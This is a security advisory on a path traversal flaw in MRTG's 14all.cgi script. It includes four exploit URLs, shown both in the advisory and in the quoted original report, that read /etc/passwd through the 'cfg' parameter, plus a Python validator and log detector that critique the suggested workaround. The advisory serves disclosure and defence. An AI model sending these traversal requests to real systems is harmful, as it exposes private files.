SecurityTracker.com
Category:   Application (Generic)  >   Multi Router Traffic Grapher (MRTG) RRD 14all.cgi Vendors:   [Multiple Authors/Vendors]
The '14all.cgi' Front End CGI Script for Multi Router Traffic Grapher (MRTG) Network Monitoring Application Has Input Validation Flaw That Discloses Portions of Files on the System to Remote Users
SecurityTracker Alert ID:  1003426
SecurityTracker URL:  http://securitytracker.com/id/1003426
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Feb 5 2002
Original Entry Date:  Feb 2 2002
Impact:   Disclosure of system information

Version(s): Mrtg/RRD 14all.cgi v1.1p15
Description:   UkR Security Team reported a vulnerability in the 14all.cgi front end for the Multi Router Traffic Grapher (MRTG) Round Robin Database (RRD) network monitoring and display application. A remote user can view portions of files on the system.

It is reported that the 14all.cgi script does not properly validate user-supplied input. By passing a relative path containing '../' sequences in the 'cfg' parameter, a remote user can reportedly view the first string of any file on the system where the script is installed.

The following types of URLs can reportedly trigger the vulnerability:

http://[target]/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd

Impact:   A remote user can view the first string of any file on the system.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following workaround:

$input =~ s/[(\.\.)|\/]//g;
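As an added illustration (not code from the advisory or from the 14all.cgi project), the following Python transcribes the suggested substitution to show what it actually removes, places a stricter validator beside it that confines 'cfg' to a plain file name inside an assumed configuration directory (the '/etc/mrtg' path is a placeholder), and adds a log-review check that flags requests shaped like the URLs above.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical directory from which a 14all.cgi-style front end loads MRTG
# config files; the real install path is not given on this page.
CFG_DIR = "/etc/mrtg"

# Literal transcription of the suggested Perl substitution.  The square
# brackets make it a character class, so it deletes every '.', '/', '(',
# ')' and '|' character individually instead of rejecting the ".." sequence.
WORKAROUND_RE = re.compile(r"[(\.\.)|\/]")

# A safe config name: a bare file name with no path separators, ending in .cfg.
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9_-]+\.cfg")


def apply_workaround(cfg: str) -> str:
    """Return what the advisory's substitution leaves of a cfg value."""
    return WORKAROUND_RE.sub("", cfg)


def resolve_cfg(cfg: str, cfg_dir: str = CFG_DIR):
    """Hardened lookup: accept only a plain name, then confirm the resolved
    path still lies directly inside cfg_dir (also catches symlinked names)."""
    if not SAFE_NAME_RE.fullmatch(cfg):
        return None
    base = os.path.realpath(cfg_dir)
    candidate = os.path.realpath(os.path.join(base, cfg))
    if os.path.dirname(candidate) != base:
        return None
    return candidate


def cfg_from_url(url: str):
    """Pull the cfg parameter out of a request URL as a web log records it."""
    values = parse_qs(urlsplit(url).query).get("cfg")
    return values[0] if values else None


def is_traversal_attempt(url: str) -> bool:
    """Log-review heuristic: a cfg value the validator refuses that also
    carries '..' or a path separator (parse_qs has already percent-decoded it)."""
    cfg = cfg_from_url(url)
    if cfg is None:
        return False
    return resolve_cfg(cfg) is None and any(s in cfg for s in ("..", "/", "\\"))
```

Note that the substitution turns a legitimate name such as 'router.cfg' into 'routercfg', which is why an allowlist plus a containment check is preferable to character stripping.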

Vendor URL:  www.wh-hms.uni-ulm.de/~widi/14all/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  new advisory


---=== UkR Security Team advisory ===---

Name          : MRTG CGI script "show files" Vulnerability
About         : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links. MRTG generates HTML pages containing GIF images which provide a LIVE visual representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem       : Problem lies in incorrect validation of user submitted-by-browser information, that can show first string of any file of the system where script installed.
Workaround    : this will help in somewhat : $input =~ s/[(\.\.)|\/]//g;
Author        : UkR-XblP / UkR security team
Exploit       : http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Copyright 2021, SecurityGlobal.net LLC